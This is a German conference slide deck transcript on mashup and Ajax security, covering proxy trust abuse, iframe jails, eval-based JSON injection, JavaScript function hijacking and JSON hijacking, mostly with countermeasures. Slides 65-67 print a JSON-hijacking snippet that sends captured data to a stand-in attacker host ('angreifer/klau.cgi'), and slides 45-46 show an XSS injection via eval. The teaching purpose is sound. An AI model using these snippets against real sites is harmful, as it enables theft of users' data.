Mashups, aber sicher. Carsten Eilers
|
|
- Paul Kramer
- vor 2 Jahren
- Abrufe
Transkript
1 Mashups, aber sicher Carsten Eilers
2 Vorstellung Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Buch Ajax Security und anderes... Schwachstellen-Datenbank Security Aktuell auf entwickler.de Carsten Eilers, 2
3 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 3
4 Vorbemerkungen (1) Programme nutzen über APIs die Funktionen des Betriebssystems Carsten Eilers, 4
5 Vorbemerkungen (2) Carsten Eilers, 5
6 Vorbemerkungen (3) Carsten Eilers, 6
7 Vorbemerkungen (4) Mashups nutzen über Internet-APIs die Funktionen von Webservices Carsten Eilers, 7
8 Vorbemerkungen (5) Es gibt unnütze Programme kaputte Programme Schadprogramme Trojaner... und das gilt auch für Webservices Carsten Eilers, 8
9 Einmal mischen, bitte (1) Altbekannter Grundsatz: Vom Client gelieferten Daten darf nicht vertraut werden Und was ist mit von anderen Servern gelieferten Daten? Und was ist mit von anderen Servern gelieferten Code? Carsten Eilers, 9
10 Einmal mischen, bitte (2) Es war einmal die Same-Origin-Policy JavaScript-Code darf nur mit dem eigenen Server kommunizieren Carsten Eilers, 10
11 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 11
12 Plattensucher (1) Plattensucher nutzt die Dienste von PlattenDB und Plattenauktionen, um Auktionen nach seltenen Schallplatten zu finden Carsten Eilers, 12
13 Plattensucher (2) Carsten Eilers, 13
14 Plattensucher 2.0 (1) Wir sind im Web den Seitenaufbau soll gefälligst der Client machen Same-Origin-Policy: Du sollst nicht mit fremden Servern sprechen Carsten Eilers, 14
15 Plattensucher 2.0 (2) Lösung: Ajax-Proxy Client verbindet sich mit Ajax-Proxy auf Plattensucher Ajax-Proxy baut Verbindung mit anderen Servern auf und leitet die Daten weiter Same-Origin-Policy erfüllt Carsten Eilers, 15
16 Plattensucher 2.0 (3) Nützlicher Nebeneffekt: Ajax-Proxy übernimmt ggf. notwendige Authentifizierung gegenüber fremden Webservice Carsten Eilers, 16
17 Plattensucher 2.0 (4) Carsten Eilers, 17
18 Plattensucher 1.0 / 2.0 Einziger Unterschied zwischen beiden Ansätzen: Beim 1. verarbeitet Plattensucher die Antworten und liefert eine HTML-Seite, beim 2. reicht Plattensucher SOAP- bzw. JSON- Daten weiter Carsten Eilers, 18
19 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 19
20 Vorteile für Angreifer Vorteile für Angreifer: Herkunft verschleiern Vertrauensbeziehung zwischen Proxy und Webservice ausnutzen Im Beispiel: Plattensucher hat Vertrag mit PlattenDB, der mehr Zugriffe erlaubt und mehr Daten liefert Carsten Eilers, 20
21 Vertrauen missbrauchen 1 Missbrauch der Vertrauensbeziehung Statt direkter Nutzung von PlattenDB als Gast Nutzung via Plattensucher ohne Einschränkungen Carsten Eilers, 21
22 Vertrauen missbrauchen 2 Carsten Eilers, 22
23 Vertrauen missbrauchen 3 Confused-Deputy-Problem (vergleichbar CSRF) Server hat bestimmte Rechte gegenüber dem Webservice und wird vom Angreifer dazu gebracht, sie gegen die Interessen des Webservices zu nutzen Carsten Eilers, 23
24 Vertrauen missbrauchen 4 Gegenmaßnahme Gleiche oder ähnliche Zugriffsrechte und -beschränkungen wie der Webservice implementieren Carsten Eilers, 24
25 Verschleierungstaktik (1) Herkunft des Angriffs verschleiern Normaler Angriff, z.b. SQL-Injection, wird nicht direkt, sondern über Mashup durchgeführt Carsten Eilers, 25
26 Verschleierungstaktik (2) Evtl. über Mashup mehr/angreifbare Funktionen zugänglich als direkt Nebeneffekt: Angriff scheinbar vom Mashup Carsten Eilers, 26
27 Verschleierungstaktik (3) Gegenmaßnahmen Alle Benutzereingaben vor ihrer Verwendung und Weiterleitung prüfen Auch vom Webservice gelieferte Daten prüfen (Gefahr indirekter Angriffe) Carsten Eilers, 27
28 Verschleierungstaktik (4) Carsten Eilers, 28
29 Verschleierungstaktik (5) Carsten Eilers, 29
30 Verschleierungstaktik (6) Weiterer Vorteil der Prüfungen: Erkennen von und Reagieren auf Fehler Jeder Fehler eines Webservices ist ein Fehler des Mashups Nicht der Webservice ist kaputt, sondern das Mashup! Carsten Eilers, 30
31 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 31
32 Ajax-Portale (1) Ajax-Portal oder Aggregate-Site verbinden für ihre Benutzer mehrere Webservices zu individuellen Seiten Komponenten (Widgets) wie z.b. RSS-Feeds, Spiele, Veranstaltungskalender, Ajax- Anwendungen,... Carsten Eilers, 32
33 Ajax-Portale (2) Daten und Code aus vielen verschiedenen Quellen auf einer Seite - das klingt nicht gut, oder? Carsten Eilers, 33
34 Alles in einer Domain (1) Problem 1: Alles auf einer Seite - alles in einer Security- Domain Same-Origin-Policy greift nicht, jeder Bestandteil darf auf alles zugreifen Bösartiges Widget hat vollen Zugriff auf alle anderen Widgets Carsten Eilers, 34
35 Alles in einer Domain (2) Lösungen: Benutzer auf Gefahr hinweisen (Ha ha ha) Alle Widgets prüfen und nur einwandfreie zulassen Was ist mit vom Benutzer geschriebenen Widgets? Was passiert bei Änderungen am Widget? Bessere Lösung: Problem direkt angehen Carsten Eilers, 35
36 Jeder in seiner Domain (1) Problem: Alle Widgets in gleicher Security-Domain Lösung: Jedes Widget in eigene Security-Domain iframe-jails: Jedes Widget bekommt eigenen iframe, dessen src-attribut eine zufällig erzeugte Sub- Domain der Aggregate-Site ist Carsten Eilers, 36
37 Jeder in seiner Domain (2) Geladen über <iframe src="http://[subdomain].aggregatesite.example/loadwidget.php?id=[widget-id]" > Trotzdem Zugriff auf andere Widgets möglich Eigene Subdomain ermitteln: location.host.substring(0, location.host.indexof('.')); Carsten Eilers, 37
38 Jeder in seiner Domain (3) Bsp: Subdomain Wenn Widget-ID bekannt und fix, beliebiges Widget in iframe im eigenen iframe nachladen: <iframe src="http://12345.aggregatesite.example/loadwidget.php?id=[widget-id]" > Danach wieder vollständiger Zugriff auf das Widget möglich Carsten Eilers, 38
39 Jeder in seiner Domain (4) Lösung: Liste mit iframe-jails einer Session führen Prüfen, ob gewünschte Subdomain bereits belegt - wenn ja, laden verweigern Carsten Eilers, 39
40 Jeder in seiner Domain (5) Weiteres Problem: Speichern von Einstellungen auf dem Server: Wenn über Widget-ID angesprochen, kann bösartiges Widget auf Konfigurationsdaten anderer Widgets zugreifen Lösung: Auch Subdomain für Adressierung verwenden - Widget-ID und Subdomain zusammen sind eindeutig Carsten Eilers, 40
41 Jeder in seiner Domain (6) Letztes Problem: Speichern der Session-ID auf dem Client Widgets dürfen keinen Zugriff auf Session-ID haben (Session-Hijacking!) Zugriff auf Cookie nicht möglich, da andere Domain Solange die ID nie an Widgets übertragen wird, kann nichts passieren Carsten Eilers, 41
42 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 42
43 JSON is evil (1) JSON is evil denn JSON wird in eval() ausgeführt, und eval() is evil! Carsten Eilers, 43
44 JSON is evil (2) {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} in var meinevariable = eval( '(' + JSON-Daten + ')' ); Carsten Eilers, 44
45 JSON is evil (3) {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} ); alert('cross-site-scripting!' Carsten Eilers, 45
46 JSON is evil (4) JSON-Daten als JSON abgekürzt: JSON ); alert('cross-site-scripting!' und damit var meinevariable = eval( ( JSON ); alert('cross-site-scripting!') ); Carsten Eilers, 46
47 JSON nochmal Weiteres Problem: Einmal der falsche MIME-Type gesetzt (text/html), und die Daten landen im Browser Richtig: application/json, dann lässt der Browser die Finger davon Carsten Eilers, 47
48 AJAX und die Hijacker Gut: JavaScript-Programme können sich zur Laufzeit selbst modifizieren Schlecht: Bösartige JavaScript-Programme können andere modifizieren Carsten Eilers, 48
49 Funktion umdefinieren (1) <script> function multipliziere(a, b) { var c = a * b; alert(a + " mal " + b + " ergibt " + c); } Carsten Eilers, 49
50 Funktion umdefinieren (2) settimeout("multipliziere = function() {alert('hi Jack was there');} ", 10000); </script> <input type="button" value="7 * 7 =?" onclick="multipliziere(7,7);"> Carsten Eilers, 50
51 Funktion umdefinieren (3) 1. Klick: onclick() wird gestartet multipliziere() wird aufgerufen und das Ergebnis ausgegeben Nach 10 Sekunden wird multipliziere() umdefiniert 2. Klick: Alertbox geht auf Carsten Eilers, 51
52 Funktion umdefinieren (4) Umdefinieren funktioniert immer, es gibt keine Warnung, keine Gegenmaßnahme Undefinieren auch als unbeabsichtige Nebenwirkung möglich Gegenmaßnahme: Namensräume, Namespaces Carsten Eilers, 52
53 Namensräume (1) Namensräume über Objekte emulierbar: var MyUtilities = {}; MyUtilities.EineFunktion = function(...) {...}; var Hilfsfunktionen = {}; Hilfsfunktionen.EineFunktion = function(...) {...}; Aufrufe über MyUtilities.EineFunktion() Hilfsfunktionen.EineFunktion() Carsten Eilers, 53
54 Namensräume (2) Namensräume sind ein Schutz vor unbeabsichtigten Kollisionen, kein Schutz vor gezielten Angriffen Carsten Eilers, 54
55 Funktion umdefinieren (5) Funktionsnamen sind Verweise auf den Funktionscode Mehrere Variablen können auf die selbe Funktion verweisen meinalarm = window.alert; meinalarm("jetzt geht eine Alert-Box auf!"); Carsten Eilers, 55
56 Funktion umdefinieren (6) window.alert() übernehmen: var originalalert = window.alert; function falscheralert(nachricht) { ausgabe = "Melde gehorsamst: " + nachricht; originalalert(ausgabe); } window.alert = falscheralert; alert("nichts zu melden!"); Carsten Eilers, 56
57 Funktion umdefinieren (7) Drei Schritte: 1. Verweis auf Originalfunktion erzeugen: originalalert 2. Neue Funktion deklarieren, die den erzeugten Verweis für die Ausgabe verwendet 3. Originalfunktion verweist auf neue Funktion Carsten Eilers, 57
58 Funktion umdefinieren (8) Prinzipiell mit allen Funktionen möglich Abhängig von ihrer Implementierung bei manchen Funktionen gar nicht oder nicht in jedem Browser möglich, aber es bleiben genug übrig Carsten Eilers, 58
59 Hijacking verhindern (1) Ansätze: Prüffunktion prüft wichtige Funktionen und wer prüft die Prüffunktion? Hashfunktionen sichern die Integrität von Daten aber wer sichert die Hashfunktion? Fazit: Ajax-Hijacking lässt sich nicht verhindern! Carsten Eilers, 59
60 Hijacking verhindern (2) Einziger Lichtblick: Die zuletzt geladene Funktion wird verwendet Wird der Code des Frameworks nach dem des Angreifers geladen, überschreibt es den Schadcode Carsten Eilers, 60
61 On-Demand-Ajax (1) JavaScript-Code wird bei Bedarf nachgeladen Ein Angreifer muss wissen, welcher Code aktuell vorhanden ist, damit er seinen nicht zu früh lädt Alle aktuell vorhandenen Funktionen sind Properties des globalen windows-objekts Carsten Eilers, 61
62 On-Demand-Ajax (2) <script> var funktionsliste = ""; for (var i in window) { if (typeof(window[i]) == "function") { funktionsliste += i + "\n"; } } alert(funktionsliste); </script> Carsten Eilers, 62
63 On-Demand-Ajax (3) Je nach Browser unterschiedliche Ergebnisse Angreifer kann Liste alle Funktionen erstellen und durch Vergleich neue erkennen Code kann über valueof() abgefragt werden Ggf. für Namensräume (Objekte) wiederholen Carsten Eilers, 63
64 JSON-Hijacking (1) Erstmals im März 2007 von Fortify beschrieben JSON-Daten werden über GET-Request geladen: Carsten Eilers, 64
65 JSON-Hijacking (2) Opfer wird auf eine Seite gelockt, auf der der Konstruktor für Objekte überschrieben wurde: <script> // Überschreiben des Object()-Constructors: // Immer wenn das Feld "letztes-feld" gesetzt // ist, wird captureobject() aufgerufen function Object() { this.letztes-feld setter = captureobject; } Carsten Eilers, 65
66 JSON-Hijacking (3) function captureobject(x) { var daten = ""; for (feld in this) { daten += feld + ": " + this[feld] + ", "; } daten += "letztes-feld: " + x; } var req = new XMLHttpRequest(); req.open("get", "http://angreifer/klau.cgi?daten=" + escape(daten), true); req.send(null); Carsten Eilers, 66
67 JSON-Hijacking (4) </script> // Die JSON-Daten werden über ein script-tag // eingelesen <script src="http://server/daten.json></script> Carsten Eilers, 67
68 JSON-Hijacking (5) Funktioniert so nur in Mozialla-Browsern, da die als einzige Erweiterungen wie setter implementieren Angriff an sich funktioniert auch ohne setter, aber trotzdem nur im Mozilla-Browsern: Nur die rufen beim Erkennen eines Literals den Array- oder Objekt-Konstruktor auf - Alle anderen tun das nur mit new() Carsten Eilers, 68
69 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 69
70 Grundprobleme (1) Grundprobleme: Woher kommen die Daten im Mashup? Wurden sie manipuliert? Wohin gehen die Daten? An wen leitet das Mashup Benutzereingaben weiter? Carsten Eilers, 70
71 Grundprobleme (2) i.a. kein Service Level Agreement mit garantierten Leistungen, Verfügbarkeits-, Backup- oder Sicherheitsversprechungen i.a. keine verbindlichen Datenschutzerklärungen Carsten Eilers, 71
72 Vertrauen (1) Kann man dem Mashup-Betreiber vertrauen? Kann man den Quellen des Mashups vertrauen? Wem soll man überhaupt vertrauen? Darf man ihm vertrauen? SSL-Zertifikat, Impressum, Datenschutzerklärung schaffen Vertrauen Carsten Eilers, 72
73 Vertrauen (2) Problem: Authentifizierung eines Benutzers für einen Webservice notwendig Was passiert mit den Daten? Werden sie ordnungsgemäß verwendet? Werden sie ordentlich geschützt? Carsten Eilers, 73
74 Vertrauen schaffen Übertragung nur SSL-Verschlüsselt Speicherung auf dem Server nur verschlüsselt Welche Daten sind vertraulich? Alle, die ein Benutzer Ihnen anvertraut! Gehen Sie immer davon aus, das sie nicht für Dritte bestimmt sind Carsten Eilers, 74
75 Integrität Von wem stammen die Daten, und sind sie unverändert? Digitale Signaturen garantieren Unversehrtheit und beweisen Identität des Erzeugers Aus Sicht eines Benutzers stammen alle Daten im Mashup vom Betreiber des Mashups Carsten Eilers, 75
76 Agenda Vorbemerkungen Aufbau eines Mashups Sicherheit des Proxies Ajax-Portale oder Aggregate-Sites JSON und JavaScript-Hacking Vertraulichkeit und Integrität Weitere Gefahren Carsten Eilers, 76
77 Weitere Gefahren Vorsicht bei der Auswahl der Komponenten Nichts muss so sein, wie es scheint Auch ein Webservice kann ein Trojanisches Pferd sein Carsten Eilers, 77
78 Schutzmaßnahmen (1) Kein Standard für den Aufbau von Mashups, erst recht keine Sicherheitstandards Wie Authentifizierung weiterreichen? Wie signierte Daten untereinander austauschen? Wie die Vielzahl vom XMLHttpRequests protokollieren? Carsten Eilers, 78
79 Schutzmaßnahmen (2) Bekannte Möglichkeiten nutzen: Identifizierung und Authentifizierung der Benutzer SSL zur Absicherung der Kommunikation zwischen Client und Server Signieren aller Daten zum Schutz vor Manipulationen Carsten Eilers, 79
80 Verfügbarkeit Nichts ist ärgerlicher, als eine nicht erreichbare Website Was passiert beim Ausfall eines Webservices? Gibt es einen möglichen Ersatz? Kann der Ausfall anderweitig kompensiert werden? Carsten Eilers, 80
81 Fragen? Carsten Eilers, 81
82 Vielen Dank für Ihre Aufmerksamkeit Material und Links auf Carsten Eilers, 82
83 Carsten Eilers, 83
Carsten Eilers. Ajax Security. Sichere Web-2.0-Anwendungen. ntwickier
Carsten Eilers Ajax Security Sichere Web-2.0-Anwendungen ntwickier Ajax, aber sicher! Geschichte Der Aufbau des Buchs Danksagung und Widmung Der Autor Ajax - Grundlagen Vom Web 1.0 zum Web 2.0 XMLHttp
Ajax, aber sicher! Carsten Eilers
Ajax, aber sicher! Carsten Eilers Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Schwachstellen-Datenbank Security Aktuell auf entwickler.de Vorstellung Carsten Eilers, www.ceilers-it.de
Carsten Eilers ceilers-it.de. Schwachstellen-Scans im Web 2.0
Carsten Eilers ceilers-it.de Schwachstellen-Scans im Web 2.0 Vorstellung» Berater für IT-Sicherheit» Autor» About Security» Standpunkt Sicherheit» und anderes...» Schwachstellen-Datenbank» Security Aktuell
Destructive AJAX. Stefan Proksch Christoph Kirchmayr
Destructive AJAX Stefan Proksch Christoph Kirchmayr AJAX-Einführung Asynchronous JavaScript And XML Clientseitiger JavaScript-Code Asynchrone Kommunikation XML DOM Klassisches Client-Server Modell AJAX-Modell
Sicherheit in Webanwendungen CrossSite, Session und SQL
Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery
Session Management und Cookies
LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss
Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
Sicherheit in Rich Internet Applications
Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Seite 2 Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Inhaltsverzeichnis Grundlagen Ajax und Mashups Adobe Flash-Player
Aktuelle Sicherheitsprobleme im Internet
Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt
Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte
Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript
Einführung in Web-Security
Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme
Identity Management mit OpenID
Lehrstuhl Netzarchitekturen und Netzdienste Institut für Informatik Technische Universität München Identity Management mit OpenID Innovative Internet Technologien und Mobilkommunikation WS2008/2009 Verfasser:
Einführung in die Cross-Plattform Entwicklung Web Services mit dem Intel XDK
Einführung in die Cross-Plattform Entwicklung Web Services mit dem Intel XDK Einführung Dieses Hands-on-Lab (HOL) macht den Leser mit dem Intel XDK und dem Zugriff auf Web Services vertraut. Der Web Service
When your browser turns against you Stealing local files
Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester
Sessions mit PHP. Annabell Langs 2004. Sessions in PHP - Annabell Langs 1
Sessions mit PHP Annabell Langs 2004 Sessions in PHP - Annabell Langs 1 Sessions» Inhaltsverzeichnis Wozu Sessions? 3 Wie funktionieren Sessions? 5 Wie kann ich die Session-ID übergeben? 8 Sicherheit 9
DNSSEC. Was ist DNSSEC? Wieso braucht man DNSSEC? Für ein sicheres Internet
SEC Für ein sicheres Internet Was ist SEC? SEC ist eine Erweiterung des Domain Namen Systems (), die dazu dient, die Echtheit (Authentizität) und die Voll ständig keit (Integrität) der Daten von - Antworten
Wiederholung: Informationssicherheit Ziele
Wiederholung: Informationssicherheit Ziele Vertraulichkeit: Schutz der Information vor unberechtigtem Zugriff bei Speicherung, Verarbeitung und Übertragung Integrität: Garantie der Korrektheit (unverändert,
XSS for fun and profit
5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,
Web Applications Vulnerabilities
Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt
Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter
Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.
Netzwerksicherheit Übung 9 Websicherheit
Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany
Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt
E-Commerce: IT-Werkzeuge. Web-Programmierung. Kapitel 4: Einführung in JavaScript Stand: 03.11.2014. Übung WS 2014/2015. Benedikt Schumm M.Sc.
Übung WS 2014/2015 E-Commerce: IT-Werkzeuge Web-Programmierung Kapitel 4: Stand: 03.11.2014 Benedikt Schumm M.Sc. Lehrstuhl für ABWL und Wirtschaftsinformatik Katholische Universität Eichstätt-Ingolstadt
Carsten Eilers / www.ceilers-it.de. Client Security im Web 2.0 und mit HTML5
Carsten Eilers / www.ceilers-it.de Client Security im Web 2.0 und mit HTML5 Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: www.ceilers-news.de...
Mozilla Persona. Hauptseminar Web Engineering. Vortrag. an identity system for the web. 10.12.2012 Nico Enderlein
Mozilla Persona an identity system for the web Hauptseminar Web Engineering Vortrag 10.12.2012 Nico Enderlein 1 PASSWORT??? BENUTZERNAME??? 2 Idee IDEE Protokoll & Implementierung Voost ( Kalender für
2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST
2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.
DOSNET SMURF ATTACK EVIL TWIN
DOSNET SMURF ATTACK EVIL TWIN Michael Armstorfer Roland Eisenhuber Mathias Fink ITS2005 / FH-Salzburg / 2007-01-14 DOSNET Gefahrenkategorie Störung Attackenkategorie Art: aktiv Ausgangspunkt: von außen
Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik
Wo ist mein Geld? Identitätsmissbrauch im Online-Banking Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik C. Sorge 2 Überblick Rechner des Kunden Server der Bank
Ausarbeitung zum Vortrag Java Web Start von Adrian Fülöp Fach: Komponentenbasierte Softwareentwicklung WS 06/07 Fachhochschule Osnabrück
Ausarbeitung zum Vortrag Java Web Start von Adrian Fülöp Fach: Komponentenbasierte Softwareentwicklung WS 06/07 Fachhochschule Osnabrück Adrian Fülöp (297545) - 1 - Inhaltsverzeichnis: 1. Einführung 2.
Wiederholung: Informationssicherheit Ziele
Wiederholung: Informationssicherheit Ziele Vertraulichkeit : Schutz der Information vor unberechtigtem Zugriff bei Speicherung, Verarbeitung und Übertragung Methode: Verschüsselung symmetrische Verfahren
Installation und Benutzung AD.NAV.ZipTools
Installation und Benutzung AD.NAV.ZipTools Version 1.0.0.0 ALTENBRAND Datentechnik GmbH Am Gelicht 5 35279 Neustadt (Hessen) Tel: 06692/202 290 Fax: 06692/204 741 email: support@altenbrand.de Die Komponente
Web Sockets mit HTML5. Quelle: www.html5rocks.com/de
Web Sockets mit HTML5 Quelle: www.html5rocks.com/de Intensive Client-Server-Kommunikation: Beispiele Online-Spiele mit mehreren Mitspielern Chat-Anwendungen Live-Sport-Ticker Echtzeit-Aktualisierungen
Carsten Eilers / www.ceilers-it.de. Sicherheit von Anfang an
Carsten Eilers / www.ceilers-it.de Sicherheit von Anfang an Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: www.ceilers-news.de...
Secure Socket Layer (SSL) - Zertifikate
e Einführung Zur Übertragung sensibler Daten über das Internet wurde das SSL-Protokoll entwickelt. SSL steht für Secure Socket Layer (dt. "sichere Sockelschicht") das von der Firma Netscape und RSA Data
Wie funktioniert das WWW? Sicher im WWW
Wie funktioniert das WWW? Sicher im WWW Der normale Aufruf 1. Browserprogramm starten 2. Adresse eintippen, z.b. : ich-hab-doch-nichts-zu-verbergen.de 3. Der Browser ändert die Adresse auf: http://ich-hab-doch-nichts-zu-verbergen.de/
AJAX SSL- Wizard Referenz
AJAX SSL- Wizard Referenz Version 1.0.2+ - 04.04.2011 Präambel Die vorliegende Dokumentation beschreibt den AJAX basierten SSL- Wizard der CertCenter AG. Der SSL- Wizard kann mit wenigen Handgriffen nahtlos
Web 2.0 und Security MySQL Webinar 30.01.2007 Johann-Peter Hartmann
MySQL Webinar 30.01.2007 Johann-Peter Hartmann Agenda Ajax und XSS Bedeutung und Verbreitung von XSS Was sind JavaScript Injections? Warum Web 2.0 und XSS besonders schmerzt Ajax Security Xml HTTP Request,
Inhaltsverzeichnis. Open-Xchange Authentication & Sessionhandling
Open-Xchange Authentication & Sessionhandling Version Date Author Changes 1.0 28.08.2006 Stephan Martin Initiale Version 1.1 29.08.2006 Marcus Klein Details Authentication via JSON 1.2 04.09.2006 Stephan
Inhaltsverzeichnis. Einleitung... 11
Einleitung................................................. 11 1 Sicherheit im Kontext von PHP und Webanwendungen........... 17 1.1 Historie: PHP............................................. 17 1.2 PHP
Netzsicherheit I, WS 2008/2009 Übung 12. Prof. Dr. Jörg Schwenk 20.01.2009
Netzsicherheit I, WS 2008/2009 Übung 12 Prof. Dr. Jörg Schwenk 20.01.2009 Aufgabe 1 1 Zertifikate im Allgemeinen a) Was versteht man unter folgenden Begriffen? i. X.509 X.509 ist ein Standard (Zertifikatsstandard)
Tobias Wassermann. Sichere Webanwendungen mit PHP
Tobias Wassermann Sichere Webanwendungen mit PHP Inhaltsverzeichnis Einleitung 11 i Sicherheit im Kontext von PHP und Webanwendungen 17 I.I Historie: PHP 17 i.2 PHP heute 19 1.3 PHP und Apache 20 1.4 PHP
Carsten Eilers www.ceilers-it.de. Pentesters Toolbox
Carsten Eilers www.ceilers-it.de Pentesters Toolbox Vorstellung Berater für IT-Sicherheit Autor PHP Magazin, Entwickler Magazin Buch Ajax Security www.ceilers-news.de und anderes... Schwachstellen-Datenbank
Sicherheitsaspekte unter Windows 2000
Sicherheitsaspekte unter Windows 2000 Margarete Kudak Sascha Wiebesiek 1 Inhalt 1. Sicherheit 1.1 Definition von Sicherheit 1.2 C2 - Sicherheitsnorm 1.3 Active Directory 2. Sicherheitslücken 3. Verschlüsselung
OWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12
OWASP Top 10 im Kontext von Magento 1 Ich Fabian Blechschmidt (@Fabian_ikono) blechschmidt@fabianblechschmidt.de PHP seit 2004 Freelancer seit 2008 Magento seit 2011 Certified Magento Developer spielt
DNS-Baustein. Thomas Ledermüller, BSc Grundschutztag Bochum 19. November 2009
DNS-Baustein, BSc Grundschutztag Bochum 19. November 2009 2 Zu meiner Person Thomas Ledermueller, BSc Masterstudium Sichere Informationssysteme (FHOOE/Campus Hagenberg) KPMG Financial Advisory Services
E-Mail-Verschlüsselung
E-Mail-Verschlüsselung In der Böllhoff Gruppe Informationen für unsere Geschäftspartner Inhaltsverzeichnis 1 E-Mail-Verschlüsselung generell... 1 1.1 S/MIME... 1 1.2 PGP... 1 2 Korrespondenz mit Böllhoff...
Oliver Zeigermann, Stefan Toth embarc GmbH. Flux Facebooks Beitrag zur UI- Architektur der Zukunft
Oliver Zeigermann, Stefan Toth embarc GmbH Flux Facebooks Beitrag zur UI- Architektur der Zukunft UI-Architektur Warum? User Experience wird wichtiger Rich Client Optionen werden rar Es gibt mehrere Philosophien
Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.
Gefahr durch Cookies Antonio Kulhanek Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.ch Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung
IAB Switzerland Anlieferung
IAB Switzerland Anlieferung Stand: 10. März 2010 Flash Spezifikation Bei Flash Werbemitteln ist die Klickzählung nicht automatisch durch den Adserver steuerund implementierbar. Deshalb ist bei der Erstellung
Eine Klasse beschreibt Objekte mit gleichen Attributen und Methoden.
Grundwissen Informatik Objekt Attribut Methoden Als Objekte bezeichnet man alle Gegenstände, Dinge, Lebewesen, Begriffe oder Strukturen unserer Welt ( Autos, Räume, Bakterien, Lehrer, Schüler, Kunden,
